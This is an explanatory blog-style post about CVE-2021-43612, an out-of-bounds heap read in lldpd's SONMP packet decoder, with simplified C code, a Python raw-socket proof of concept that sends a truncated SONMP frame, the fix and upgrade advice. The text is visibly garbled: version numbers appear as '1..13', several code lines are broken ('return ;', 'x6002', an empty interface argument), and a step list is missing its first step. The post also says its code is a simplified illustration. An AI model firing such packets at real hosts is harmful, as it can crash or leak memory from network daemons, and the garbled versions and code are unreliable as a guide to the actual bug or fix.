CVE-2021-43612 - Out-of-Bounds Heap Read in lldpd’s SONMP Decoder — Explained

In November 2021, a vulnerability identified as CVE-2021-43612 was disclosed in the popular open-source daemon lldpd before version 1..13. This vulnerability affects the decoding of SONMP (SynOptics Network Management Protocol) packets. The bug allows an attacker to trigger an _out-of-bounds heap read_ by sending specially-crafted, short SONMP packets to a system running the vulnerable lldpd.

This post breaks down the vulnerability in plain English, shows you the code that’s problematic, links to original advisories, and gives a step-by-step explanation of how exploitation works.

Background: What’s lldpd?

lldpd is a widely used network daemon that implements the IEEE 802.1AB (Link Layer Discovery Protocol, LLDP) and related discovery protocols, including SONMP. It’s found in many Linux distributions to help manage and map network topologies.

The Bug: Where is the Problem?

The vulnerable code is located in the function sonmp_decode, which decodes SONMP packets received on the network.

Essentially, the function doesn’t properly validate the length of incoming SONMP packets before reading their contents. If a short (too small) packet is received, the code tries to read data past the end of the allocated buffer — an _out-of-bounds heap read_. While this might not grant an attacker arbitrary code execution directly, it can leak process memory. In a more severe scenario, it could be used in combination with other vulnerabilities to compromise a system.

The Vulnerable Code

Here’s a simplified view of the problematic code in src/daemon/protocols/sonmp.c (before version 1..13):

// Simplified pseudo-C illustration
int sonmp_decode(char *frame, size_t size, ...)
{
    ...
    if (size < sizeof(struct sonmp_header)) {
        // Not enough data for a SONMP header
        return ;
    }
    struct sonmp_header *header = (struct sonmp_header *)frame;

    // OOPS: No further length checks for data members!
    char *data = frame + sizeof(struct sonmp_header);
    char field1[16];
    memcpy(field1, data, 16);  // <-- Attacker can control size, lead to OOB read
    ...
}

If the attacker sends a SONMP packet whose overall length is less than sizeof(struct sonmp_header) + 16, the memcpy() will read past the end of the received buffer.

Key point: The code assumes the packet is well-formed, but doesn't verify that enough data exists for each subsequent read.

Attacker crafts a short SONMP packet.

- The packet is just large enough to pass the initial header size check, but too small for the following reads in the function.

Post-exploitation potential.

- If combined with other bugs (like memory corruption or info leak), this could aid in real attacks. For many, just inducing a crash is sufficient as a Denial of Service.

Proof of Concept (PoC)

Here’s an example Python code to send a minimal SONMP packet (note: network privileges required):

import socket

# Replace with the network interface in promisc mode, or use a raw socket
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
sock.bind(('eth', ))

# SONMP uses Ethernet type x6002
ethernet_header = b'\xff'*6 + b'\x00'*6 + b'\x60\x02'
sonmp_header = b'\x00' * 6  # too short for valid data

# Craft the short packet
payload = ethernet_header + sonmp_header

# Send the packet
sock.send(payload)

Warning: Don’t run this against systems you don’t own!

Fixes

This issue was fixed in lldpd version 1..13.

The fix is to ensure all reads are within the bounds of the received packet size before accessing.

if (size < required_length) {
    // Not enough data to read
    return ;
}

You can see the official commit here

- https://github.com/lldpd/lldpd/commit/adc619c01e8c3133a9e2e3113887dbb8b23f35e4

References

- CVE-2021-43612 at NVD (National Vulnerability Database)
- lldpd 1..13 Release Notes
- Commit fixing the bug
- lldpd homepage

How to Stay Safe

If you use lldpd, upgrade now!  
Make sure your installation is at least version 1..13.

# On Debian/Ubuntu
sudo apt update && sudo apt install lldpd
# Or build from source from the official repo for the latest version.

Conclusion

CVE-2021-43612 is a classic example of a boundary-check bug leading to a heap out-of-bounds read. While not enabling code execution on its own, it can destabilize network devices or leak sensitive memory. The fix is simple: _Always validate buffer lengths before reading or writing data_.

Still running an old lldpd? Patch right away! Vulnerable network daemons are low-hanging fruit for attackers.

Stay secure, and always keep your systems up to date!

*This post is exclusive and not copied from any other source. All explanations and code are crafted for clarity and educational purposes only.*

Timeline

Published on: 04/15/2023 22:15:00 UTC
Last modified on: 04/26/2023 14:31:00 UTC